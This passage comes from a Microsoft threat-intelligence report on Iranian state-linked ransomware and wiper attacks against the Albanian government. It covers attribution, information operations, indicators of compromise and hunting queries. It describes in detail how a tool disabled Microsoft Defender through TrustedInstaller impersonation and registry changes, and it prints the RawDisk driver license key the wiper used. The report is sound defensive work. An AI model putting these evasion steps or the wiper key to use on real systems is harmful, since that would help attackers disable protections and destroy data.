_Jason.exe_ to access compromised mailboxes. A public analysis of _Jason.exe _can be found [here](<https://marcoramilli.com/2019/06/06/apt34-jason-project/>). Note that this tool was reportedly used by actors affiliated with MOIS.\n\nFigure 3. Screenshot of the _Jason.exe _tool\n\n### Ransomware and wiper\n\nThe cyberattack on the Albanian government used a common tactic of Iranian state sponsored actors by [deploying ransomware first](<https://www.sentinelone.com/labs/from-wiper-to-ransomware-the-evolution-of-agrius/>), followed by deployment of the wiper malware. The wiper and ransomware both had forensic links to Iranian state and Iran-affiliated groups. The wiper that DEV-0842 deployed in this attack used the same license key and EldoS RawDisk driver as ZeroCleare, a wiper that Iranian state actors used in an attack on a Middle East energy company in mid-2019. In that case, [IBM X-Force assessed](<https://www.ibm.com/downloads/cas/OAJ4VZNJ>) that actors affiliated with EUROPIUM gained initial access nearly a year ahead of the wiper attack. The wiper attack was subsequently performed by a separate and unknown Iranian actor. This is similar to the chain of events Microsoft detected against the Albanian government.\n\nThe code used in this attack had the following properties:\n\n**Filename**| **SHA-256** \n---|--- \ncl.exe| e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0 \nrwdsk.sys| 3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6 \n \nEmbedded in the _cl.exe_ wiper was the hex-string \u2018B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D,\u2019 which was the same license key used for the EldoS RawDisk driver of the ZeroCleare wiper documented by IBM X-Force in 2019. The Eldos driver is a legitimate tool that was also abused by the ZeroCleare wiper and was used to delete files, disks, and partitions on the target systems. While ZeroCleare is not widely used, this tool is being shared amongst a smaller number of affiliated actors including actors in Iran with links to MOIS.\n\nThe ransomware payload used in this attack by the DEV-0842 operator had the following properties:\n\n**Filename**| **SHA-256** \n---|--- \nGoXml.exe| f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5 \n \nThis tool was signed with an invalid digital certificate from Kuwait Telecommunications Company KSC. This certificate had a SHA-1 thumbprint of 55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f.\n\nMicrosoft telemetry indicates this certificate was only used to sign 15 other files\u2014a very small footprint, suggesting the certificate was not widely shared amongst unrelated actor groups. Multiple other binaries with this same digital certificate were previously seen on files with links to Iran, including a known DEV-0861 victim in Saudi Arabia in June 2021:\n\n**Filename**| **SHA-256** \n---|--- \nRead.exe| ea7316bbb65d3ba4efc7f6b488e35db26d3107c917b665dc7a81e327470cb0c1 \n \nIt\u2019s not clear if _Read.exe_ was dropped by DEV-0861 on this Saudi victim or if DEV-0861 also handed off access to the Saudi victim to DEV-0842.\n\n## Additional indications of Iranian state sponsorship\n\nThe messaging, timing, and target selection of the cyberattacks bolstered our confidence that the attackers were acting on behalf of the Iranian government. The messaging and target selection indicate Tehran likely used the attacks as retaliation for [cyberattacks Iran perceives were carried out by Israel and the Mujahedin-e Khalq (MEK)](<https://www.jpost.com/middle-east/article-708830>), an Iranian dissident group largely based in Albania that seeks to overthrow the Islamic Republic of Iran.\n\n### Messaging\n\nThe attacker\u2019s logo is an eagle preying on the symbol of the hacking group \u2018Predatory Sparrow\u2019 inside the Star of David (Figure 4). This signals the attack on Albania was retaliation for Predatory Sparrow\u2019s [operations against Iran](<https://www.jpost.com/middle-east/article-708830>), which Tehran perceives involved Israel. Predatory Sparrow has claimed responsibility for several [high-profile](<https://www.theguardian.com/world/2021/jul/11/cyber-attack-hits-irans-transport-ministry-and-railways>) and [highly sophisticated](<https://apnews.com/article/technology-middle-east-iran-dubai-b0404963ae23e5008439a0b607952de1>) [cyberattacks against Iran state-linked entities](<https://www.reuters.com/world/middle-east/irans-state-broadcaster-says-it-was-hacked-10-seconds-2022-01-27/>) since July 2021. This included a cyberattack that disrupted television programming of the Islamic Republic of Iran Broadcasting (IRIB) with images saluting MEK leaders in late January. Predatory Sparrow forewarned about the attack hours ahead of time and claimed they supported and paid for it, indicating others were involved. Iranian officials blamed this cyberattack on the MEK and additionally blamed the MEK and Israel for a cyberattack that used the same images and messaging against the Tehran municipality [in June](<https://www.bloomberg.com/news/articles/2022-01-27/iran-state-tv-says-exiled-dissidents-briefly-hacked-broadcasts>).\n\nThe message in the ransom image indicates that the MEK, a long-standing adversary of the Iranian regime, was the primary target behind their attack on the Albanian government. The ransom image, like several posts by Homeland Justice, the group overtly pushing messages and leaking data linked to the attack, asked \u201cwhy should our taxes be spent on terrorists of Durres.\u201d This is a reference to the MEK, who [Tehran considers terrorists](<https://en.mfa.ir/files/mfaen/s.pdf>), who have a large refugee camp in Durr\u00ebs County in Albania.\n\nFigure 4. Ransomware image and Homeland Justice banner\n\nThe messaging linked to the attack closely mirrored the messaging used in cyberattacks against Iran, a common tactic of Iranian foreign policy suggesting an intent to signal the attack as a form of retaliation. The level of detail mirrored in the messaging also reduces the likelihood that the attack was a false flag operation by a country other than Iran. \n\n * The contact numbers listed in the ransom image (Figure 4), for example, were linked to multiple senior Albanian leaders, mirroring the cyberattacks on Iran\u2019s railways and fueling pumps, which included [a contact phone number belonging to the Iranian Supreme Leader\u2019s Office](<https://twitter.com/IranIntl_En/status/1452944995741315079>).\n * The messages in the information operations also emphasized targeting of corrupt government politicians and their support for terrorists and an interest in not harming the Albanian people (Figure 5). Similarly, the attack on Iranian steel companies claimed to [target the steel factories](<https://twitter.com/GonjeshkeDarand/status/1541288345183158272?cxt=HHwWgIC88a7l4OMqAAAA>) for their connections to the Islamic Revolutionary Guard Corps (IRGC) while avoiding harm to Iranians. Another [cyberattack on an Iranian airline](<https://www.timesofisrael.com/blacklisted-iranian-airlines-targeted-in-cyberattack/>) in late 2021, which was claimed by Hooshyaran-e Vatan (meaning \u201cObservants of the Fatherland\u201d in Farsi), emphasized Tehran\u2019s corruption and misappropriation of money on IRGC activities abroad. \nFigure 5. Message from Homeland Justice days after the cyberattack.\n\n### Timing\n\nThe cyberattack on July 15 occurred weeks after [a string of cyberattacks on Iran](<https://www.iranintl.com/en/202207032504>), one week ahead of the MEK-sponsored Free Iran World Summit and aligned with other Iranian policy moves against the MEK, further bolstering the likelihood of Iranian involvement. On July 16, the day after the cyberattack, Iran\u2019s Ministry of Foreign Affairs issued [a statement](<https://www.iranintl.com/en/202207162442>) designating current and former American politicians for supporting the MEK. The Free Iran World Summit, which the Iranian regime actively opposes, was [canceled this year](<https://abcnews.go.com/International/wireStory/terror-threat-cancels-iranian-oppositions-summit-albania-87267980>) following warnings of [possible terrorist threats](<https://al.usembassy.gov/security-alert-threat-targeting-the-free-iran-world-summit-july-21-2022/>) to the Summit on July 21. A few days after the planned Free Iran World Summit, Iranian official press issued an editorial calling for military action against the MEK in Albania. This string of events suggests there may have been a whole-of-government Iranian effort to counter the MEK from Iran\u2019s Ministry of Foreign Affairs, to intelligence agencies, to official press outlets.\n\n### Target selection\n\nSome of the Albanian organizations targeted in the destructive attack were the equivalent organizations and government agencies in Iran that experienced prior cyberattacks with MEK-related messaging. This suggests the Iranian government chose those targets to signal the cyberattacks as a form of direct and proportional retaliation, a common tactic of the regime.\n\n## Parallel information operations and amplification\n\nBefore and after the Homeland Justice messaging campaign was launched, social media persona accounts and a group of real-life Iranian and Albanian nationals known for their pro-Iran, anti-MEK views, promoted the campaign\u2019s general talking points and amplified the leaks published by the Homeland Justice accounts online. The parallel promotion of the Homeland Justice campaign and its central themes by these entities in the online space\u2014before and after the cyberattack\u2014suggests a broad-based information operation aimed at amplifying the impact of the attack.\n\nAhead of the cyberattack, on June 6, Ebrahim Khodabandeh, a disaffected former MEK member posted [an open letter](<https://web.archive.org/web/20220907003825/https:/www.nejatngo.org/en/posts/14089>) addressed to Albanian Prime Minister Edi Rama warning of the consequences of escalating tensions with Iran. Invoking \u201c[h]acking of Tehran municipal systems\u201d and \u201c[gas stations](<https://www.npr.org/2021/10/27/1049566231/irans-president-says-cyberattack-was-meant-to-create-disorder-at-gas-pumps>),\u201d Khodabandeh claimed that the MEK was the source of \u201csabotaging acts against the interests of the Iranian people [sic]\u201d and argued that these constituted \u201cthe hostile work of your government\u201d and has caused \u201cobvious enmity with the Iranian nation [sic].\u201d\n\nFour days later, on June 10, Khodabandeh and the Nejat Society, an anti-MEK NGO that he heads, hosted a group of Albanian nationals in Iran. The group included members of another anti-MEK organization called the Association for the Support of Iranians Living in Albania (ASILA)\u2014Gjergji Thanasi, Dashamir Mersuli, and Vladimir Veis. Given the highly political nature of ASILA\u2019s work on issues related to a group that Tehran considers a terrorist organization (the MEK), it is highly possible that this visit was conducted with sanction from the state. Upon their return from Iran, on July 12, Nejat Society said Albanian [police raided their offices](<https://archive.vn/zhR7m>) and detained some ASILA members. While Nejat Society said this raid was a result of \u201cfalse and baseless accusations,\u201d [according to local media](<https://nacionale.com/kulture/beteja-mes-muhaxhedineve-dhe-revolucionareve-ne-iran-eskalon-ne-panairin-e-librit-ne-durres>) the raid stemmed from possible connections to Iranian intelligence services.\n\nFigure 6. ASILA members in Iran in June 2022. Pictured, from left, are Gjergji Thanasi, Ebrahim Khodabandeh, Dashamir Mersuli, and Vladimir Veis.\n\nIn the wake of the cyberattack, on July 23, Thanasi and Olsi Jazexhi, another Albanian national who frequently appears on Iran\u2019s state-sponsored media outlet PressTV espousing anti-MEK positions, penned [a second open letter](<https://archive.vn/N8yZN>) addressed to then-Albanian President Ilir Meta, also published on Nejat Society\u2019s website. This letter echoed Homeland Justice\u2019s central claim\u2014namely that Albania\u2019s continuing to host the MEK constituted a danger to the Albanian people. Jazexhi and Thanasi called on Meta to convene Albania\u2019s National Security Council to \u201cconsider whether Albania has entered into a cyber and military conflict with the Islamic Republic of Iran.\u201d\n\nIn May 2021, at around the same time that Iranian actors began their intrusion into Albanian government victim systems, accounts for [two anti-MEK](<https://twitter.com/ali_pouladi>) [social media personas](<https://twitter.com/OliverCarol11>), which do not appear to correspond to real people, were created on both Facebook and Twitter. The accounts largely post anti-MEK content and engage with the social media accounts of some of the individuals detailed above. These two accounts along with a third, older account, were among the first to promote posts from Homeland Justice accounts on Twitter, and all three dramatically increased the rate of anti-MEK posts after the mid-July 2022 cyberattack became public.\n\nThere exists some additional evidence that the role of these personas extended beyond mere social media amplification and into content production. One of the personas which repeatedly posted Homeland Justice content had previously written for the now-defunct [IRGC-linked American Herald Tribune](<https://www.justice.gov/opa/pr/united-states-seizes-27-additional-domain-names-used-iran-s-islamic-revolutionary-guard-corps>) and other fringe news sites, often in negative terms about the MEK. A second persona account, meanwhile, may have [attempted to contact at least one Albanian newspaper](<https://web.archive.org/web/20220907002152/https:/twitter.com/ali_pouladi/status/1560161092231380994>) ahead of the hack-and-leak, requesting \u201ccooperation\u201d, and the ability to publish with the outlet.\n\nThe parallel promotion of the Homeland Justice campaign and its central themes by these individuals and personas online both before and after the cyberattack adds a compelling human dimension to the broader Homeland Justice influence effort. While there were no observed direct relationships between the threat actors responsible for the destructive attack and these messaging actors, their actions raise questions worthy of further examination.\n\n## Observed actor activity\n\nDART and MSTIC supported the post ransom and wiper attack analysis leveraging [Microsoft 365 Defender](<https://www.microsoft.com/security/business/siem-and-xdr/microsoft-365-defender>) and collection of additional forensic artifacts. Analysis identified the use of vulnerabilities to implant web shells for persistence, reconnaissance actions, common credential harvesting techniques, defense evasion methods to disable security products, and a final attempt of actions on objective deploying encryption and wiping binaries. The Iranian sponsored attempt at destruction had less than a 10% total impact on the customer environment.\n\n### Access and implant\n\nBased on investigative analysis, starting in May 2021, actors exploited vulnerabilities of a public-facing endpoint to execute arbitrary code that implanted web shells on the unpatched SharePoint server (Collab-Web2.*.*), as stated previously. These generic web shells provided the ability to upload files, download files, delete files, rename, execute commands with an option to run as specific user.\n\nFigure 7. The web shell console from the attacker\u2019s point of view\n\nWeb shells were placed in the following directories:\n\n * C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\evaluatesiteupgrade.cs.aspx\n * C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\Pickers.aspx\n * C:\\ProgramData\\COM1\\frontend\\Error4.aspx\n\n### Lateral movement and execution\n\nFollowing initial access and implant, the threat actor was observed using Mimikatz for credential harvesting and a combination of Impacket and Remote Desktop Clients for lateral movement efforts using the built-in administrator account. Unrecoverable tooling was identified, which highly suggests that reconnaissance efforts were present in the form of file names of executables, resident mailbox data, database, and user details. Similar actions by the threat actors observed by MSTIC and DART detail both custom and open-source tooling utilized for these efforts. Artifacts of tooling identified:\n\n * IPGeter.exe\n * FindUser.exe\n * recdisc.exe\n * NetE.exe\n * advanced_port_scanner.exe\n * mimikatz.exe\n * shared.exe\n * Stored CSV and TXT files\n\n### Data collection\n\nDuring the period of October 2021 \u2013 January 2022, the threat actors used a unique email exfiltration tool which interacted with the Exchange web services APIs to collect email in a manner that masked the actions. The threat actors accomplished these actions by creating an identity named \u201cHealthMailbox55x2yq\u201d to mimic a Microsoft Exchange Health Manager Service account using Exchange PowerShell commands on the Exchange Servers. The threat actors then added the account to the highly privileged exchange built-in role group \u201cOrganization Management\u201d to later add the role of \u201cApplication Impersonation\u201d. The [ApplicationImpersonation](<https://docs.microsoft.com/exchange/applicationimpersonation-role-exchange-2013-help>) management role enables applications to impersonate users in an organization to perform tasks on behalf of the user, providing the ability for the application to act as the owner of a mailbox.\n\n### Defense evasion\n\nPrior to launching the final stage of the attack, the threat actors gained administrative access to a deployed endpoint detection and response (EDR) solution to make modifications, removing libraries that affected the agents across the enterprise. In addition, a binary to disable components of Microsoft Defender Antivirus was propagated using custom tooling. The distributed binary named _disable-defender.exe_ queries for TokenElevation using the GetTokenInformation API and checks if the process is running with elevated privileges. If the token is not running with elevated privilege, the binary prints &quot;Must run as admin!\\n&quot;. If the token is elevated, it queries TokenUser and checks if the SID is &quot;S-1-5-18&quot;. If the current process doesn&#x27;t run under system context, it prints &quot;Restarting with privileges\\n&quot; and attempts to elevate the privilege.\n\nTo elevate the privilege, the binary checks if the TrustedInstaller service is enabled. To do this, it starts the service &quot;SeDebugPrivilege&quot; and &quot;SeImpersonatePrivilege&quot; to assign privileges to itself. It then looks for _winlogon.exe_ process, acquires its token, and impersonates calling thread using ImpersonateLoggedOnUser/SetThreadToken. After impersonating as _winlogon.exe_, it opens TrustedInstaller process, acquires its token for impersonation and creates a new process with elevated privileges using CreateProcessWithTokenW.\n\nFigure 8. How the attacker is able to evade defense components\n\nOnce it successfully creates its own process with TrustedInstaller privilege, it proceeds to disable Defender components.\n\n * Terminates smartscreen.exe\n * Modifies WinDefend service to DemandLoad.\n * Modifies &quot;TamperProtection&quot; value to 0\n * Queries WMI &quot;Root\\Microsoft\\Windows\\Defender&quot; Namespace &quot;MSFT_MpPreference&quot; class for &quot;DisableRealtimeMonitoring&quot;\n * Sets &quot;DisableAntiSpyware&quot; value to 1\n * Sets &quot;SecurityHealth&quot; value to 3\n * Sets &quot;DisableAntiSpyware&quot; value to 0\n * Sets &quot;SYSTEM\\CurrentControlSet\\Services\\WinDefend&quot; service &quot;Start&quot; value to 3\n * Sets &quot;DisableRealtimeMonitoring&quot; value to 1\n * Modifies further settings using WMI &quot;Root\\Microsoft\\Windows\\Defender&quot; Namespace &quot;MSFT_MpPreference&quot; class values,\n * &quot;EnableControlledFolderAccess&quot;\n * &quot;PUAProtection&quot;\n * &quot;DisableRealtimeMonitoring&quot;\n * &quot;DisableBehaviorMonitoring&quot;\n * &quot;DisableBlockAtFirstSeen&quot;\n * &quot;DisablePrivacyMode&quot;\n * &quot;SignatureDisableUpdateOnStartupWithoutEngine&quot;\n * &quot;DisableArchiveScanning&quot;\n * &quot;DisableIntrusionPreventionSystem&quot;\n * &quot;DisableScriptScanning&quot;\n * &quot;DisableAntiSpyware&quot;\n * &quot;DisableAntiVirus&quot;\n * &quot;SubmitSamplesConsent&quot;\n * &quot;MAPSReporting&quot;\n * &quot;HighThreatDefaultAction&quot;\n * &quot;ModerateThreatDefaultAction&quot;\n * &quot;LowThreatDefaultAction&quot;\n * &quot;SevereThreatDefaultAction&quot;\n * &quot;ScanScheduleDay&quot;\n\nAdditional evasion techniques included the deletion of tooling, Windows events, and application logs.\n\n### Actions on objective\n\nDistribution of the encryption and wiping binaries was accomplished with two methods via a custom SMB remote file copy tool _Mellona.exe_, originally named _MassExecuter.exe_. The first method remote file copied the ransom binary _GoXml.exe_ and a bat file that triggers the execution of the ransom or wiper on a user login. The second method was by remotely invoking the ransom binary with the _Mellona.exe_ tool, post SMB remote file copy.\n\nFigure 9. Process Command lines for _Mellona.exe_ used to distribute malware\n\n _win.bat_ \u2013 Batch file for ransom execution - Trojan:Win32/BatRunGoXml\n\n * Executes the ransom binary from the All Users starts up folder and will be executed on the trigger of a user login.\nFigure 10. _Win.bat _contents\n\n_GoXml.exe_ \u2013 ransomware binary - Ransom:Win32/Eagle!MSR\n\n * Takes &gt;= 5 arguments, and the arguments can be anything, as it looks for argument count only. If the number of the command line arguments is less than 5, it will error and create an Open dialog box via GetOpenFileNameA that lets the user open a *.xml file\n * If 5 or more command line arguments were provided, it will firstly check the running instances by opening the Mutex below via OpenMutexA:\n \n \n \u201cGlobal\\\\abcdefghijklmnoklmnopqrstuvwxyz01234567890abcdefghijklmnopqrstuvwxyz01234567890\u201d\n\n * If there are no other running instances, it will create the Mutex above via CreateMutexA.\n * Attempts to mount all the volumes:\n * Finds available volumes via FindFirstVolumeW and FindNextVolumeW.\n * Retrieves the mounted folders of the volume via GetVolumePathNamesForVolumeNameW.\n * If there is no mounted point for the volume, creates a new directory named c:\\\\\\HD%c (%c is A, B, C, \u2026) via CreateDirectoryW.\n * Mounts the volume to the newly create directory via SetVolumeMountPointW.\n * Launches _cmd.exe _and runs the following batch script through anonymous pipe:\nFigure 11. Batch script content of the ransomware\n\n * Strings are encrypted with RC4 Algorithm with key \u201c8ce4b16b22b58894aa86c421e8759df3\u201d.\n * Generates Key using rand() function and uses that to derive RC4 key to encrypt files. The derived key is then encrypted with Public key hardcoded in the file.\n * This encrypted key is then encoded with customized Base64 characters and appended to the ransom note.\n * Renames the file as _[original file name].lck_, and then encrypts the renamed file.\n * Drops a ransom notes file named _How_To_Unlock_MyFiles.txt_ in each folder before encrypting the files, the ransom notes are written in Albanian.\nFigure 12. Ransom note written in Albanian\n\n * Performs a self-delete by launching _cmd.exe_ and executes a batch script though anonymous pipe to perform deletion.\nFigure 13. Batch script for deletion\n\n_cl.exe_ \u2013 wiper \u2013 Dos:Win64/WprJooblash\n\n * _cl.exe_ takes the following parameters\n * cl.exe in \u2013 Installs the driver _rwdsk.sys _and its service\n * cl.exe un \u2013 Uninstalls the driver _rwdsk.sys _and its service\n * cl.exe wp &lt;PATH&gt; - Wipes the give path leveraging _rwdsk.sys _driver\nFigure 14. The malware using _rwdsk.sys_\n\n * Service created: HKLM\\SYSTEM\\CurrentControlSet\\Services\\RawDisk3\n * Installed driver should be located in C:\\Windows\\System32\\drivers\\rwdsk.sys or the same directory cl.exe is staged.\nFigure 15. Directory where the driver is installed\n\n * By providing path (Example: \\??\\PHYSICALDRIVE0) with the &#x27;wp&#x27; parameter, passes it to the below function including GENERIC_READ | GENERIC_WRITE access value and a hexadecimal value &quot;B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D&quot;. Based on the reference below, the same hex value is used in ZeroCleare Wiper in 2020. [IBM confirms](<https://www.ibm.com/downloads/cas/OAJ4VZNJ>) this value is the license key for RawDisk\nFigure 16. Hex value used in ZeroCleare Wiper\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion\n * Block inbound traffic from IPs specified in the Indicators of compromise table\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity \n \n**NOTE: **Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure your accounts\n * Enable [Microsoft Defender Antivirus tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection>) to prevent unwanted malicious apps disabling components of Microsoft Defender Antivirus\n * [Understand and assess your cyber exposure with advanced vulnerability and configuration assessment tools](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management>)\n\n## Indicators of compromise (IOCs)\n\nThe table below shows IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\n**Indicator**| **Type**| **Description** \n---|---|--- \nGoXml.exe| SHA-256| f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5 \n&quot;w.zip&quot;, \n&quot;cl.exe&quot; \n&quot;cls5.exe&quot;| SHA-256| e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0 \nWin.bat| SHA-256| bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6 \nADExplorer.exe| SHA-256| bb45d8ffe245c361c04cca44d0df6e6bd7596cabd70070ffe0d9f519e3b620ea \nLdd.2.exe| SHA-256| e67c7dbd51ba94ac4549cc9bcaabb97276e55aa20be9fae909f947b5b7691e6b \nMellona.exe| SHA-256| ac4809764857a44b269b549f82d8d04c1294c420baa6b53e2f6b6cb4a3f7e9bd \nSl.exe| SHA-256| d1bec48c2a6a014d3708d210d48b68c545ac086f103016a20e862ac4a189279e \nHxD.exe (Hex Editor)| SHA-256| d145058398705d8e20468332162964dce5d9e2ad419f03b61adf64c7e6d26de5 \nLsdsk.exe| SHA-256| 1c926d4bf1a99b59391649f56abf9cd59548f5fcf6a0d923188e7e3cab1c95d0 \nNTDSAudit.exe| SHA-256| fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b \nDisable-defender.exe| SHA-256| 45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace \nRognar.exe| SHA-256| dfd631e4d1f94f7573861cf438f5a33fe8633238d8d51759d88658e4fbac160a \nIpgeter.exe| SHA-256| 734b4c06a283982c6c3d2952df53e0b21e55f3805e55a6ace8379119d7ec1b1d \nevaluatesiteupgrade.aspx| SHA-256| f8db380cc495e98c38a9fb505acba6574cbb18cfe5d7a2bb6807ad1633bf2df8 \nPickers.aspx| SHA-256| 0b647d07bba697644e8a00cdcc8668bb83da656f3dee10c852eb11effe414a7e \nClientBin.aspx| SHA-256| 7AD64B64E0A4E510BE42BA631868BBDA8779139DC0DAAD9395AB048306CC83C5 \nApp_Web_bckwssht.dll| SHA-256| CAD2BC224108142B5AA19D787C19DF236B0D12C779273D05F9B0298A63DC1FE5 \nC:\\Users\\&lt;User name&gt;\\Desktop\\| Staging directory| \nC:\\ProgramData\\| Staging directory| \nC:\\Users\\&lt;User name&gt;\\Desktop\\a| Staging directory| \nC:\\ProgramData\\1\\| Staging directory| \nC:\\ProgramData\\2\\| Staging directory| \n144[.]76[.]6[.]34| IP address| Accessed web shell \n148[.]251[.]232[.]252| IP address| Accessed web shell \n148[.]251[.]233[.]231| IP address| Accessed web shell \n176[.]9[.]18[.]143| IP address| Accessed web shell \n185[.]82[.]72[.]111| IP address| Accessed web shell \n216[.]24[.]219[.]65| IP address| Accessed web shell \n216[.]24[.]219[.]64| IP address| Accessed web shell \n46[.]30[.]189[.]66| IP address| Accessed web shell \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\nMicrosoft Defender Threat Intelligence Community members and customers can find summary information and all IOCs from this blog post in the linked [Microsoft Defender Threat Intelligence article](<https://ti.defender.microsoft.com/articles/37f61f2a>).\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Microsoft Defender Antivirus\n\n * TrojanDropper:ASP/WebShell!MSR (web shell)\n * Trojan:Win32/BatRunGoXml (malicious BAT file)\n * DoS:Win64/WprJooblash (wiper)\n * Ransom:Win32/Eagle!MSR (ransomware)\n * Trojan:Win32/Debitom.A (_disable-defender.exe_)\n\n#### Microsoft Defender for Endpoint EDR\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint>) customers should watch for these alerts that can detect behavior observed in this campaign. Note however that these alerts are not indicative of threats unique to the campaign or actor groups described in this report.\n\n * Suspicious behavior by Web server process\n * Mimikatz credential theft tool\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious RDP connection observed\n * Addition to Exchange Organization Management role group\n * TrustedInstaller hijack attempt\n * Microsoft Defender Antivirus tampering\n * Process removed a security product\n * Tamper protection bypass\n * Suspicious file in startup folder\n * Ransomware behavior detected in the file system\n * Ransomware behavior by remote device\n * Emerging threat activity group\n\n#### Microsoft Defender Vulnerability Management\n\n[Microsoft Defender Vulnerability Management](<https://www.microsoft.com/security/business/threat-protection/microsoft-defender-vulnerability-management>) surfaces impacted devices that may be affected by the Exchange (ProxyLogon) and SharePoint vulnerabilities used in the attack:\n\n * [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0604>)\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)\n\n## Advanced hunting queries\n\n### Microsoft Sentinel\n\nTo locate possible threat actor activity mentioned in this blog post, Microsoft Sentinel customers can use the queries detailed below:\n\n**Identify threat actor IOCs**\n\nThis query identifies a match based on IOCs related to EUROPIUM across various Microsoft Sentinel data feeds:\n\n * [https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/EUROPIUM _September2022.yaml](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/EUROPIUM%20_September2022.yaml>)\n\n**Identify Microsoft Defender Antivirus detection related to EUROPIUM**\n\nThis query looks for Microsoft Defender AV detections related to EUROPIUM actor and joins the alert with other data sources to surface additional information such as device, IP, signed-in users, etc.\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/EuropiumAVHits.yaml>\n\n**Identify creation of unusual identity **\n\nThe query below identifies creation of unusual identity by the Europium actor to mimic Microsoft Exchange Health Manager Service account using Exchange PowerShell commands.\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/EuropiumUnusualIdentity.yaml>\n\n### Microsoft 365 Defender\n\nTo locate possible threat actor activity mentioned in this blog post, Microsoft 365 Defender customers can use the queries detailed below:\n\n**Identify EUROPIUM IOCs**\n\nThe following query can locate activity possibly associated with the EUROPIUM threat actor. [Github link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/EUROPIUM/Identify%20EUROPIUM%20IOCs.yaml>)\n \n \n DeviceFileEvents | where SHA256 in (\"f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5\",\"e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0\",\"bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6\",\"bb45d8ffe245c361c04cca44d0df6e6bd7596cabd70070ffe0d9f519e3b620ea\",\"d1bec48c2a6a014d3708d210d48b68c545ac086f103016a20e862ac4a189279e\",\"fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b\",\"45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace\",\"f8db380cc495e98c38a9fb505acba6574cbb18cfe5d7a2bb6807ad1633bf2df8\",\"7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5\",\"cad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5\",\"84be43f5830707cd421979f6775e9edde242bab98003644b3b491dbc08cc7c3e\")\n\n**Identify Microsoft Defender Antivirus detection related to EUROPIUM**\n\nThis query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor. [Github link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/EUROPIUM/Identify%20Microsoft%20Defender%20Antivirus%20detection%20related%20to%20EUROPIUM.yaml>)\n \n \n let europium_sigs = dynamic([\"BatRunGoXml\", \"WprJooblash\", \"Win32/Eagle!MSR\", \"Win32/Debitom.A\"]); \n AlertEvidence\n | where ThreatFamily in~ (europium_sigs)\n | join AlertInfo on AlertId\n | project ThreatFamily, AlertId\n\n**Identify unusual identity additions related to EUROPIUM**\n\nThis query looks for identity additions through exchange PowerShell. [Github link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/EUROPIUM/Identify%20unusual%20identity%20additions%20related%20to%20EUROPIUM.yaml>)\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"New-Mailbox\",\"Update-RoleGroupMember\") and ProcessCommandLine has \"HealthMailbox55x2yq\"\n\nThe post [Microsoft investigates Iranian attacks against the Albanian government](<https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-08T15:00:00", "type": 